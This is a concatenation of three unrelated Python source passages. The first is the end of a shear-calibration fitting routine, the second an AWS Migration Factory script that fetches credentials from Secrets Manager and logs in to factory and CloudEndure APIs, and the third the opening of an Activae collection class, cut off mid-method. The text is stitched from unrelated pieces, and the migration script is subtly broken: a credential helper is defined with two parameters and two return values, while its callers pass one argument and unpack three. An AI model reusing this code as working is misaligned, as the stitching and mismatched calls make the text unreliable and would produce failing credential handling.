            g2_in_used=[]
            for kk in range(len(g1Range)):
                maskShear=(g1_inSim_mask==g1Range[kk])&(g2_inSim_mask==g2Range[kk])
                numMasked=len(e1Sim_mask[maskShear])
                if (numMasked >0):
                    #Calculating bin average for calibration quantities
                    g1_out.append(np.average(e1Sim_mask[maskShear], weights=wgSim_mask[maskShear]))
                    g2_out.append(np.average(e2Sim_mask[maskShear], weights=wgSim_mask[maskShear]))
                    # 1/sqrt(sum of weights) as the fit uncertainty of the mean
                    g_out_w.append(1./(np.sum(wgSim_mask[maskShear]))**0.5)
                    #
                    g1_in_used.append(g1Range[kk])
                    g2_in_used.append(g2Range[kk])
            # Start mc fitting
            numShear=len(g1_out)
            if(numShear<3):
                # Fewer than 3 distinct shear values: the 2-parameter (m, c)
                # fit is under-constrained, so abort the whole run.
                print('Cannot do the regression in bin ', \
                    bin1_bounds[i], bin1_bounds[i+1], bin2_bounds[i][j], bin2_bounds[i][j+1], \
                    ' less than 3 shear values! (', numShear, ')')
                exit()
            else:
                g1_in_used = np.array(g1_in_used)
                g2_in_used = np.array(g2_in_used)
                g1_out = np.array(g1_out)
                g2_out = np.array(g2_out)
                g_out_w = np.array(g_out_w)
                # Weighted least-squares fits of g_out vs g_in per component;
                # element [0] of the parameter vector is m, [1] is c.
                m1c1, err1 = optimize.curve_fit(mcFitFunc, xdata=g1_in_used, ydata=g1_out, sigma=g_out_w)
                m2c2, err2 = optimize.curve_fit(mcFitFunc, xdata=g2_in_used, ydata=g2_out, sigma=g_out_w)
                m1 = m1c1[0]
                m1_err = (err1[0,0])**0.5
                # # #
                # c1 = m1c1[1]
                # c1_err = (err1[1,1])**0.5
                #
                m2 = m2c2[0]
                m2_err = (err2[0,0])**0.5
                # # #
                # c2 = m2c2[1]
                # c2_err =(err2[1,1])**0.5
                #
                #
                # m = (m1 + m2)/2.
                # Performing Bootstrap: resample the shear points with
                # replacement and refit to estimate the scatter of m.
                nboot = 50
                m1_sample = np.zeros(nboot)
                m2_sample = np.zeros(nboot)
                m_sample = np.zeros(nboot)
                # c1_sample = np.zeros(nboot)
                # c2_sample = np.zeros(nboot)
                for BS_index in range(nboot):
                    # Retrieving random shears
                    index = np.random.randint(0,numShear,numShear)
                    BS_g1_in = g1_in_used[index]
                    BS_g2_in = g2_in_used[index]
                    BS_g1_out = g1_out[index]
                    BS_g2_out = g2_out[index]
                    BS_g_out_w = g_out_w[index]
                    m1c1, err1 = optimize.curve_fit(mcFitFunc, xdata=BS_g1_in, ydata=BS_g1_out, sigma=BS_g_out_w)
                    m2c2, err2 = optimize.curve_fit(mcFitFunc, xdata=BS_g2_in, ydata=BS_g2_out, sigma=BS_g_out_w)
                    m1_sample[BS_index] = m1c1[0]
                    m2_sample[BS_index] = m2c2[0]
                    m_sample[BS_index] = (m1c1[0]+m2c2[0])/2.
                    # c1_sample[BS_index] = m1c1[1]
                    # c2_sample[BS_index] = m2c2[1]
                m1_err_BS = np.std(m1_sample)
                m2_err_BS = np.std(m2_sample)
                m_err_BS = np.std(m_sample)
                # c1_err_BS = np.std(c1_sample)
                # c2_err_BS = np.std(c2_sample)
            #
            # Record this bin's results (the if-branch above exits, so these
            # values are always defined here).
            m1s.append(m1)
            m2s.append(m2)
            m1_errs.append(m1_err)
            m2_errs.append(m2_err)
            m1_err_BSs.append(m1_err_BS)
            m2_err_BSs.append(m2_err_BS)
            m_err_BSs.append(m_err_BS)
    wgRealSums = np.array(wgRealSums)
    m1s = np.array(m1s)
    m2s = np.array(m2s)
    m1_errs = np.array(m1_errs)
    m2_errs = np.array(m2_errs)
    m1_err_BSs = np.array(m1_err_BSs)
    m2_err_BSs = np.array(m2_err_BSs)
    m_err_BSs = np.array(m_err_BSs)
    # Combine the per-bin m-values weighted by the data weight in each bin;
    # errors are combined in quadrature with the same weights.
    m1_final = np.average(m1s, weights=wgRealSums)
    m2_final = np.average(m2s, weights=wgRealSums)
    m_final = (m1_final+m2_final)/2.
    m1_err_final = np.sqrt(np.sum((wgRealSums*m1_errs)**2.))/np.sum(wgRealSums)
    m2_err_final = np.sqrt(np.sum((wgRealSums*m2_errs)**2.))/np.sum(wgRealSums)
    m1_err_BS_final = np.sqrt(np.sum((wgRealSums*m1_err_BSs)**2.))/np.sum(wgRealSums)
    m2_err_BS_final = np.sqrt(np.sum((wgRealSums*m2_err_BSs)**2.))/np.sum(wgRealSums)
    m_err_BS_final = np.sqrt(np.sum((wgRealSums*m_err_BSs)**2.))/np.sum(wgRealSums)
    #
    res = {"id_bin": id_bin, "m_final": m_final, 'm_err_BS_final': m_err_BS_final, \
        'm1_final': m1_final, 'm2_final': m2_final, \
        'm1_err_final': m1_err_final, 'm2_err_final': m2_err_final, \
        'm1_err_BS_final': m1_err_BS_final, 'm2_err_BS_final': m2_err_BS_final}
    pq.put(res)
|
#########################################################################################
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. #
# SPDX-License-Identifier: MIT-0 #
# #
# Permission is hereby granted, free of charge, to any person obtaining a copy of this #
# software and associated documentation files (the "Software"), to deal in the Software #
# without restriction, including without limitation the rights to use, copy, modify, #
# merge, publish, distribute, sublicense, and/or sell copies of the Software, and to #
# permit persons to whom the Software is furnished to do so. #
# #
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, #
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A #
# PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT #
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION #
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE #
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. #
#########################################################################################
# Version: 17MAY2021.01
import sys
import argparse
import requests
import json
import getpass
import boto3
import botocore
import calendar
import time
import base64
# Epoch timestamp (UTC seconds) captured at import time.
ts = calendar.timegm(time.gmtime())
region = ""
Domain_User= ''
Domain_Password = ''
# boto session for secretsmanager
try:
    boto_session = boto3.session.Session()
    from botocore.exceptions import ClientError
except:
    # NOTE(review): bare except silently swallows session/import failures and
    # leaves boto_session/ClientError undefined — confirm this is intended.
    region = ""
# NOTE(review): region is initialized to "" above and never set to None, so
# this branch cannot fire; presumably a leftover from an earlier
# region-detection step — confirm.
if region == None:
    region = ""
# Constants referenced from other modules.
ce_endpoint = '/api/latest/{}'
ce_address = 'https://console.cloudendure.com'
ce_headers = {'Content-Type': 'application/json'}
serverendpoint = '/prod/user/servers'
appendpoint = '/prod/user/apps'
waveendpoint = '/prod/user/waves'
# Load the Migration Factory endpoint configuration from the working directory.
with open('FactoryEndpoints.json') as json_file:
    mf_config = json.load(json_file)
# common functions
def _prompt_password_twice(prompt):
    """Prompt twice for a password until both entries match; return it."""
    pass_first = getpass.getpass(prompt)
    pass_second = getpass.getpass("Re-enter Password: ")
    while pass_first != pass_second:
        print("Password mismatch, please try again!")
        pass_first = getpass.getpass(prompt)
        pass_second = getpass.getpass("Re-enter Password: ")
    return pass_second


def GetWindowsPassword(domainuser):
    """
    Resolve Windows credentials for the Migration Factory.

    Looks the credentials up in Secrets Manager (secret
    "MGN_WINDOWS_CREDENTIAL") and falls back to interactive prompts when the
    secret is missing or does not match the requested user.

    Parameters:
        domainuser -- preferred Windows user name, or "" to use the stored
                      (or prompted) one.

    Returns:
        (Domain_User, Domain_Password). Both are "" when no branch below
        resolves them (previously this path raised UnboundLocalError).
    """
    # NOTE(review): get_details_from_secret_manager is declared with two
    # parameters later in this file but is called with one here — confirm
    # the intended signature.
    Domain_User_temp, Domain_Password_temp, token = get_details_from_secret_manager("MGN_WINDOWS_CREDENTIAL")
    # Fix: initialize so uncovered branch combinations (e.g. stored user
    # matches but the stored password is empty) return "" instead of crashing.
    Domain_User = ''
    Domain_Password = ''
    if domainuser != "" and Domain_User_temp != domainuser:
        # Caller asked for a different user than the stored one: prompt.
        Domain_User = domainuser
        print("Windows credentials for Migration Factory missing. Please setup the Secrets in Secret Manager!!!")
        Domain_Password = _prompt_password_twice("Windows User Password: ")
    elif domainuser != "" and Domain_User_temp == domainuser and Domain_Password_temp != "":
        # Stored secret matches the requested user: reuse it.
        Domain_User = domainuser
        Domain_Password = Domain_Password_temp
    elif not domainuser and Domain_User_temp != "" and Domain_Password_temp != "":
        # No preference given: use the stored credentials wholesale.
        Domain_User = Domain_User_temp
        Domain_Password = Domain_Password_temp
    elif not domainuser and not Domain_User_temp:
        # Nothing stored and nothing requested: prompt for everything.
        Domain_User = input("Enter Windows Username: ")
        # Fix: the original assigned an unresolved placeholder here; use the
        # confirmed password from the double prompt.
        Domain_Password = _prompt_password_twice("Windows User Password: ")
    return Domain_User, Domain_Password
def get_linux_password():
    """
    Resolve Linux credentials for the Migration Factory.

    Tries Secrets Manager first ("MGN_LINUX_CREDENTIAL" for user/password,
    "PE" for user/private key); a configured private key takes precedence
    over a password. Falls back to interactive prompts when neither secret
    is populated; exits when the secrets exist but hold no credential.

    Returns:
        (user_name, pass_key, key_exist) where pass_key is either the
        password or the private-key file name, and key_exist flags the latter.
    """
    user_name = ''
    pass_key = ''
    has_key = ''
    key_exist = False
    # NOTE(review): user_name was just set to '', so this guard is always
    # true; kept for parity with the original control flow.
    if not user_name or user_name == '':
        print("****************************************************")
        print("* Fetching Linux login details from secret manager *")
        print("****************************************************")
        # NOTE(review): get_details_from_secret_manager is declared with two
        # parameters later in this file but called with one — confirm.
        user_name_temp, password, token = get_details_from_secret_manager("MGN_LINUX_CREDENTIAL")
        user_name1, pem_key, token = get_details_from_secret_manager("PE")
        if not user_name1 and not user_name_temp:
            print("Linux credentials for Migration Factory missing. Please setup the Secrets in Secret Manager!!!")
            user_name = input("Enter Linux Username: ")
            has_key = input("If you use a private key to login, press [Y] or if use password press [N]: ")
            # Fix: the original tested `has_key.lower() in 'y'`, which is also
            # True for the empty string, so pressing Enter selected key login.
            if has_key.lower() == 'y':
                pass_key = input('Private Key file name: ')
                key_exist = True
            else:
                pass_key_first = getpass.getpass('Enter Linux Password : ')
                pass_key_second = getpass.getpass('Re-enter Linux Password: ')
                while pass_key_first != pass_key_second:
                    print("Password mismatch, please try again!")
                    pass_key_first = getpass.getpass('Enter Linux Password : ')
                    pass_key_second = getpass.getpass('Re-enter Linux Password: ')
                pass_key = pass_key_second
        elif not password and not pem_key:
            print("Linux credentials for Migration Factory missing. Configure either password or private key in "
                  "Secrets Manager!!!")
            sys.exit(1)
        elif pem_key != "":
            # If both PEM Key and Password is configured, PEM key would take the preference.
            print("Login using Linux Private key")
            user_name = user_name1
            pass_key = pem_key
            key_exist = True
        else:
            print("Login using Linux password")
            user_name = user_name_temp
            pass_key = password
    return user_name, pass_key, key_exist
def Factorylogin():
    """
    Log in to the Migration Factory and return its auth token (str).

    Credentials come from the Secrets Manager secret
    "MFServiceAccount-<UserPoolId>" when configured; otherwise the user is
    prompted interactively (with mf_config['DefaultUser'] as the default).
    Exits the process on authentication failure; raises SystemExit when the
    login API is unreachable.
    """
    username = ""
    password = ""
    using_secret = False
    if 'UserPoolId' in mf_config and 'Region' in mf_config:
        try:
            secretsmanager_client = boto3.client('secretsmanager', mf_config['Region'])
            # mf_service_account_details = secretsmanager_client.describe_secret(SecretId='MFServiceAccount-' + mf_config['UserPoolId'])
            mf_service_account = secretsmanager_client.get_secret_value(SecretId='MFServiceAccount-' + mf_config['UserPoolId'])
            #username = mf_service_account_details['Description']
            mfauth = json.loads(mf_service_account['SecretString'])
            username = mfauth['username']
            password = mfauth['password']
            using_secret = True
        except botocore.exceptions.ClientError as e:
            print(e)
            if e.response['Error']['Code'] == 'ResourceNotFoundException' or e.response['Error']['Code'] == 'AccessDeniedException':
                print("Service Account doesn't exist or access is denied to Secret, please enter username and password")
                if 'DefaultUser' in mf_config:
                    DefaultUser = mf_config['DefaultUser']
                else:
                    DefaultUser = ''
                username = input("Factory Username [" + DefaultUser + "]: ") or DefaultUser
                # Fix: restored from a redaction-mangled call; the password is
                # read without echo, matching the interactive branch below.
                password = getpass.getpass('Factory Password: ')
    else:
        if 'DefaultUser' in mf_config:
            DefaultUser = mf_config['DefaultUser']
        else:
            DefaultUser = ""
        username = input("Factory Username [" + DefaultUser + "]: ") or DefaultUser
        # Fix: restored from a redaction-mangled call (was not valid Python).
        password = getpass.getpass('Factory Password: ')
    login_data = {'username': username, 'password': password}
    try:
        r = requests.post(mf_config['LoginApiUrl'] + '/prod/login',
                          data=json.dumps(login_data))
        if r.status_code == 200:
            print("Migration Factory : You have successfully logged in")
            print("")
            token = str(json.loads(r.text))
            return token
        if r.status_code == 502 or r.status_code == 400:
            if using_secret:
                print("ERROR: Incorrect username or password stored in Secrets Manager [MFServiceAccount-" + mf_config['UserPoolId'] + "] in region " + mf_config['Region'] + ".")
            else:
                print("ERROR: Incorrect username or password....")
            sys.exit()
        else:
            print(r.text)
            sys.exit()
    except requests.ConnectionError as e:
        raise SystemExit("ERROR: Connecting to the Login API failed, please check Login API in FactoryEndpoints.json file. "
                         "If the API endpoint is correct, please close cmd and open a new cmd to run the script again")
def ServerList(waveid, token, UserHOST, Projectname):
    """
    Fetch the wave's servers from the Migration Factory, split by OS family.

    Returns (servers_Windows, servers_Linux); exits the process when a server
    record is missing a mandatory attribute.
    """
    auth = {"Authorization": token}
    servers = json.loads(requests.get(UserHOST + serverendpoint, headers=auth).text)
    apps = json.loads(requests.get(UserHOST + appendpoint, headers=auth).text)

    # Collect the app ids belonging to this wave, optionally restricted to a
    # single CloudEndure project.
    applist = []
    for app in apps:
        if 'wave_id' not in app or str(app['wave_id']) != str(waveid):
            continue
        if Projectname != "":
            if str(app['cloudendure_projectname']) == str(Projectname):
                applist.append(app['app_id'])
        else:
            applist.append(app['app_id'])

    # Partition the wave's servers by OS family, validating mandatory fields.
    servers_Windows = []
    servers_Linux = []
    for app_id in applist:
        for server in servers:
            if app_id != server['app_id']:
                continue
            if 'server_os_family' not in server:
                print ('server_os_family attribute does not exist for server: ' + server['server_name'] + ", please update this attribute")
                sys.exit(2)
            if 'server_fqdn' not in server:
                print("ERROR: server_fqdn for server: " + server['server_name'] + " doesn't exist")
                sys.exit(4)
            if server['server_os_family'].lower() == "windows":
                servers_Windows.append(server)
            if server['server_os_family'].lower() == "linux":
                servers_Linux.append(server)

    if not servers_Windows and not servers_Linux:
        print("ERROR: Serverlist for wave: " + waveid + " in CE Project " + Projectname + " is empty....")
        print("")
    else:
        print("successfully retrieved server list")
        print("")
        if servers_Windows:
            print("*** Windows Server List")
            for server in servers_Windows:
                print(server['server_name'])
        else:
            print("*** No Windows Servers")
        print("")
        if servers_Linux:
            print("*** Linux Server List ***")
            print("")
            for server in servers_Linux:
                print(server['server_name'])
        else:
            print("*** No Linux Servers")
    return servers_Windows, servers_Linux
def CElogin(userapitoken):
    """
    Log in to the CloudEndure API with a user API token.

    Returns (session_cookie, xsrf_token); xsrf_token is None when the
    response carries no XSRF-TOKEN cookie, and (None, None) on auth,
    license, or throttling failures. Mutates the module-level ce_headers
    with the XSRF token on success.
    """
    # Fix: restored from a redaction-mangled literal (was not valid Python).
    login_data = {'userApiToken': userapitoken}
    r = requests.post(ce_address + ce_endpoint.format('login'),
                      data=json.dumps(login_data), headers=ce_headers)
    if r.status_code == 200:
        print("CloudEndure : You have successfully logged in")
        print("")
    if r.status_code != 200 and r.status_code != 307:
        if r.status_code == 401 or r.status_code == 403:
            print('ERROR: The CloudEndure login credentials provided cannot be authenticated....')
            return None, None
        elif r.status_code == 402:
            print('ERROR: There is no active license configured for this CloudEndure account....')
            return None, None
        elif r.status_code == 429:
            print('ERROR: CloudEndure Authentication failure limit has been reached. The service will become available for additional requests after a timeout....')
            return None, None
    # check if need to use a different API entry point
    if r.history:
        endpointnew = '/' + '/'.join(r.url.split('/')[3:-1]) + '/{}'
        r = requests.post(ce_address + endpointnew.format('login'),
                          data=json.dumps(login_data), headers=ce_headers)
    try:
        ce_headers['X-XSRF-TOKEN'] = r.cookies['XSRF-TOKEN']
        return r.cookies['session'], ce_headers['X-XSRF-TOKEN']
    except KeyError:
        # Fix: narrowed from a bare except — only the missing-cookie lookup
        # is expected to fail here.
        pass
    return r.cookies['session'], None
def GetCERegion(project_id, ce_session, ce_headers):
    """
    Return the AWS region code for each replication configuration of a
    CloudEndure project, mapped from the human-readable region name.
    Unrecognised names contribute "" and print a warning.
    """
    # Ordered (name fragment -> region code) table; the first matching
    # fragment wins, reproducing the original if/elif chain exactly.
    name_to_code = (
        ("Northern Virginia", 'us-east-1'),
        ("Frankfurt", 'eu-central-1'),
        ("Paris", 'eu-west-3'),
        ("Stockholm", 'eu-north-1'),
        ("Northern California", 'us-west-1'),
        ("Oregon", 'us-west-2'),
        ("AWS GovCloud (US)", 'us-gov-west-1'),
        ("Bahrain", 'me-south-1'),
        ("Hong Kong", 'ap-east-1'),
        ("Tokyo", 'ap-northeast-1'),
        ("Singapore", 'ap-southeast-1'),
        ("AWS GovCloud (US-East)", 'us-gov-east-1'),
        ("Mumbai", 'ap-south-1'),
        ("South America", 'sa-east-1'),
        ("Sydney", 'ap-southeast-2'),
        ("London", 'eu-west-2'),
        ("Central", 'ca-central-1'),
        ("Ireland", 'eu-west-1'),
        ("Seoul", 'ap-northeast-2'),
        ("Ohio", 'us-east-2'),
    )
    region_ids = []
    rep = requests.get(ce_address + ce_endpoint.format('projects/{}/replicationConfigurations').format(project_id), headers=ce_headers, cookies=ce_session)
    for item in json.loads(rep.text)['items']:
        region = requests.get(ce_address + ce_endpoint.format('cloudCredentials/{}/regions/{}').format(item['cloudCredentials'], item['region']), headers=ce_headers, cookies=ce_session)
        name = json.loads(region.text)['name']
        region_code = ""
        for fragment, code in name_to_code:
            if fragment in name:
                region_code = code
                break
        else:
            print("Incorrect Region Name")
        region_ids.append(region_code)
    return region_ids
#Function is used with new MGN capabiltiy to get servers based on the AWS account they are targeted to.
def get_factory_servers(waveid, token, UserHOST, osSplit = True):
    """
    Return the wave's servers grouped by target AWS account (new MGN flow).

    Parameters:
        waveid  -- wave identifier used to select apps/servers.
        token   -- Migration Factory auth token.
        UserHOST -- base URL of the factory user API.
        osSplit -- when True, split each account's servers into
                   'servers_windows'/'servers_linux'; otherwise one
                   'servers' list per account.

    Returns:
        (aws_accounts, linux_exist, windows_exist) when osSplit is True,
        otherwise aws_accounts alone. Exits the process on any validation
        failure (bad account id, empty wave, missing server attributes).
    """
    try:
        linux_exist = False
        windows_exist = False
        auth = {"Authorization": token}
        # Get all Apps and servers from migration factory
        getservers = json.loads(requests.get(UserHOST + serverendpoint, headers=auth).text)
        getapps = json.loads(requests.get(UserHOST + appendpoint, headers=auth).text)
        # Sort for deterministic output ordering.
        servers = sorted(getservers, key = lambda i: i['server_name'])
        apps = sorted(getapps, key = lambda i: i['app_name'])
        # Get Unique target AWS account and region
        aws_accounts = []
        for app in apps:
            if 'wave_id' in app and 'aws_accountid' in app and 'aws_region' in app:
                if str(app['wave_id']) == str(waveid):
                    # AWS account ids are always 12 digits.
                    if len(str(app['aws_accountid']).strip()) == 12:
                        target_account = {}
                        target_account['aws_accountid'] = str(app['aws_accountid']).strip()
                        target_account['aws_region'] = app['aws_region'].lower().strip()
                        if osSplit:
                            target_account['servers_windows'] = []
                            target_account['servers_linux'] = []
                        else:
                            target_account['servers'] = []
                        # Deduplicate on (account, region) pairs.
                        if target_account not in aws_accounts:
                            aws_accounts.append(target_account)
                    else:
                        msg = "ERROR: Incorrect AWS Account Id Length for app: " + app['app_name']
                        print(msg)
                        sys.exit()
        if len(aws_accounts) == 0:
            msg = "ERROR: Server list for wave " + waveid + " is empty...."
            print(msg)
            sys.exit()
        # Get server list: attach each wave server to its (account, region).
        for account in aws_accounts:
            print("### Servers in Target Account: " + account['aws_accountid'] + " , region: " + account['aws_region'] + " ###")
            for app in apps:
                if 'wave_id' in app and 'aws_accountid' in app and 'aws_region' in app:
                    if str(app['wave_id']) == str(waveid):
                        if str(app['aws_accountid']).strip() == str(account['aws_accountid']):
                            if app['aws_region'].lower().strip() == account['aws_region']:
                                for server in servers:
                                    if 'app_id' in server:
                                        if server['app_id'] == app['app_id']:
                                            # verify server_os_family attribute, only accepts Windows or Linux
                                            if 'server_os_family' in server:
                                                # Verify server_fqdn, this is mandatory attribute
                                                if 'server_fqdn' in server:
                                                    if osSplit:
                                                        if server['server_os_family'].lower() == 'windows':
                                                            account['servers_windows'].append(server)
                                                        elif server['server_os_family'].lower() == 'linux':
                                                            account['servers_linux'].append(server)
                                                        else:
                                                            print("ERROR: Invalid server_os_family for: " + server['server_name'] + ", please select either Windows or Linux")
                                                            sys.exit()
                                                    else:
                                                        account['servers'].append(server)
                                                    print(server['server_fqdn'])
                                                else:
                                                    print("ERROR: server_fqdn for server: " + server['server_name'] + " doesn't exist")
                                                    sys.exit()
                                            else:
                                                print("ERROR: server_os_family does not exist for: " + server['server_name'])
                                                sys.exit()
            print("")
            if osSplit:
                # Check if the server list is empty for both Windows and Linux
                if len(account['servers_windows']) == 0 and len(account['servers_linux']) == 0:
                    msg = "ERROR: Server list for wave " + waveid + " and account: " + account['aws_accountid'] + " region: " + account['aws_region'] + " is empty...."
                    print(msg)
                    sys.exit()
                if len(account['servers_linux']) > 0:
                    linux_exist = True
                if len(account['servers_windows']) > 0:
                    windows_exist = True
            else:
                if len(account['servers']) == 0:
                    msg = "ERROR: Server list for wave " + waveid + " and account: " + account['aws_accountid'] + " region: " + account['aws_region'] + " is empty...."
                    print(msg)
                    sys.exit()
        if osSplit:
            return aws_accounts, linux_exist, windows_exist
        else:
            return aws_accounts
    except botocore.exceptions.ClientError as error:
        # Strip the exception class prefix and print only the message parts.
        if ":" in str(error):
            err = ''
            msgs = str(error).split(":")[1:]
            for msg in msgs:
                err = err + msg
            msg = "ERROR: " + err
            print(msg)
            sys.exit()
        else:
            msg = "ERROR: " + str(error)
            print(msg)
            sys.exit()
def get_MGN_Source_Server(factoryserver, mgn_sourceservers):
    """Locate the MGN source server record matching a factory server.

    Archived source servers are skipped. For each remaining server,
    matching is attempted (case-insensitively, whitespace-stripped)
    against both factoryserver['server_name'] and ['server_fqdn']:
      1. any IP of the primary network interface,
      2. the agent-reported identification hints (hostname / fqdn).

    Parameters
    ----------
    factoryserver : dict
        Must contain 'server_name' and 'server_fqdn'.
    mgn_sourceservers : iterable of dict
        Items as returned by MGN DescribeSourceServers.

    Returns
    -------
    dict or None
        The first matching source server, or None when nothing matches.
    """
    name = factoryserver['server_name'].lower().strip()
    fqdn = factoryserver['server_fqdn'].lower().strip()
    for sourceserver in mgn_sourceservers:
        if sourceserver['isArchived']:
            continue
        # 1) Match against any IP address of the primary network interface.
        for interface in sourceserver['sourceProperties'].get('networkInterfaces', []):
            if interface['isPrimary'] is True:
                for ip in interface['ips']:
                    if ip.lower().strip() in (name, fqdn):
                        return sourceserver
        # 2) Fall back to the identification hints; use .get() because the
        #    agent may not report both 'hostname' and 'fqdn'.
        hints = sourceserver['sourceProperties'].get('identificationHints', {})
        for hint in (hints.get('hostname'), hints.get('fqdn')):
            if hint is not None and hint.lower().strip() in (name, fqdn):
                return sourceserver
    return None
def get_details_from_secret_manager(secret_name,linux_secret_type):
    """Fetch source-server credentials from AWS Secrets Manager.

    Parameters
    ----------
    secret_name : str
        Name of the secret to read.
    linux_secret_type : str
        'password' or '' for username/password secrets; 'pemkey' for
        base64-encoded private-key secrets (a temp .pem file is created).

    Returns
    -------
    tuple
        (username, password) on the normal path. For 'pemkey' secrets,
        'username' holds the key name and 'password' the temp file path.
        NOTE(review): the interactive branch below returns THREE values
        (username, password, token) -- confirm every caller unpacks the
        matching shape.
    """
    # This function uses default profile to fetch the current region of the user.
    region = mf_config['Region']
    username = ''
    password = ''
    token = ''
    if region == "":
        # No region configured: caller must use an interactive session.
        print("Using interactive session")
        return username, password, token
    # Create a Secrets Manager client
    client = boto_session.client(
        service_name='secretsmanager',
        region_name=region
    )
    try:
        get_secret_value_response = client.get_secret_value(
            SecretId=secret_name
        )
    except ClientError as e:
        if e.response['Error']['Code'] == 'DecryptionFailureException':
            # Secrets Manager can't decrypt the protected secret text using the provided KMS key.
            # Deal with the exception here, and/or rethrow at your discretion.
            print("Secrets Manager can't decrypt the protected secret text using the provided KMS key %s" % e)
            raise e
        elif e.response['Error']['Code'] == 'InternalServiceErrorException':
            # An error occurred on the server side.
            # Deal with the exception here, and/or rethrow at your discretion.
            print("An error occurred on the server side %s" % e)
            raise e
        elif e.response['Error']['Code'] == 'InvalidParameterException':
            # You provided an invalid value for a parameter.
            # Deal with the exception here, and/or rethrow at your discretion.
            print("An error occurred on the server side %s" % e)
            raise e
        elif e.response['Error']['Code'] == 'InvalidRequestException':
            # You provided a parameter value that is not valid for the current state of the resource.
            # Deal with the exception here, and/or rethrow at your discretion.
            print("You provided an invalid value for a parameter %s" % e)
            raise e
        elif e.response['Error']['Code'] == 'ResourceNotFoundException':
            # We can't find the resource that you asked for.
            # NOTE(review): this branch does not re-raise, so execution falls
            # through and the function returns empty username/password.
            print("We can't find the resource that you asked for in Secret Manager")
    else:
        # Depending on whether the secret is a string or binary, one of these fields will be populated.
        if 'SecretString' in get_secret_value_response:
            secret = json.loads(get_secret_value_response['SecretString'])
            if (linux_secret_type == "password") or (linux_secret_type == ""):
                if 'username' in secret:
                    username = secret["username"]
                if 'password' in secret:
                    password = secret["password"]
            elif linux_secret_type == "pemkey":
                # IN this case, create a temporary pem file and return the pem file name
                if 'secret_key' in secret:
                    username = secret["secret_key"]
                if 'secret_value' in secret:
                    password = create_temp_pem_file(secret["secret_value"])
    return username, password
def create_temp_pem_file(secret_value):
    """Write a base64-encoded PEM private key to a temporary file.

    Parameters
    ----------
    secret_value : str
        Base64-encoded key material from Secrets Manager.

    Returns
    -------
    str
        The name of the created .pem file.
    """
    import os  # local import keeps this security fix self-contained

    # 'ts' is a module-level timestamp used to make the file name unique.
    temp_pem_file_name = "migrationsource_temp_"+str(ts)+".pem"
    # Private-key material: create the file with owner-only permissions
    # (0o600) instead of inheriting the process umask default.
    fd = os.open(temp_pem_file_name, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, 'w') as f:
        f.write(base64.b64decode(secret_value).decode("utf-8"))
    return temp_pem_file_name
<reponame>helix84/activae
# -*- coding: utf-8 -*-
# Copyright (C) 2010 CENATIC: Centro Nacional de Referencia de
# Aplicacion de las TIC basadas en Fuentes Abiertas, Spain.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# Neither the name of the CENATIC nor the names of its contributors
# may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# You may contact the copyright holder at: Fundacion CENATIC, Edificio
# de Servicios Sociales: C/ Vistahermosa, 1, 3ra planta, 06200
# Almendralejo (Badajoz), Spain
import os
import Asset
import OpAsset
import Collection
from ACL import ACL
from DBSlayer import query_check_success, Query
class OpCollection:
    """Persistence operations (add/update/delete) for a Collection.

    Wraps a Collection.Collection instance and keeps its assets in sync
    by rewriting each asset's 'collections_id' through OpAsset, with
    best-effort rollback on partial failure.

    NOTE(review): all SQL below is built with %-interpolation; if any of
    these values can originate from user input this is an SQL-injection
    risk -- consider parameterized queries in DBSlayer.
    """
    def __init__ (self, collection = None, debug_params = None):
        # debug_params carries ACL context (e.g. 'roles', 'user_id') used
        # by ACL.set_default_collection_acl() in add().
        self.params = debug_params
        if isinstance (collection,Collection.Collection):
            self._collection = collection
        elif collection == None or type(collection) == int:
            # Load an existing collection by id, or build an empty one.
            self._collection = Collection.Collection(collection)
        else:
            raise TypeError
    def __update_assets (self, changes):
        """Update collections_id for all (asset_id,col_id) pairs specified."""
        # Track successful updates so they can be rolled back if a later
        # update fails; returns False on the first failure.
        reversions = []
        for asset_id, col_id in changes:
            a = Asset.Asset (asset_id)
            old_col_id = a['collections_id']
            a['collections_id'] = col_id
            oa = OpAsset.OpAsset(a)
            ok = oa.update()
            if ok:
                reversions.append((asset_id, old_col_id))
            else:
                self.__revert_assets (reversions)
                return False
        return True
    def __revert_assets (self, changes):
        """Undo changes to the assets."""
        # Best-effort: failures during revert are ignored.
        for asset_id, col_id in changes:
            a = Asset.Asset (asset_id)
            a['collections_id'] = col_id
            oa = OpAsset.OpAsset(a)
            ok = oa.update()
    def add (self):
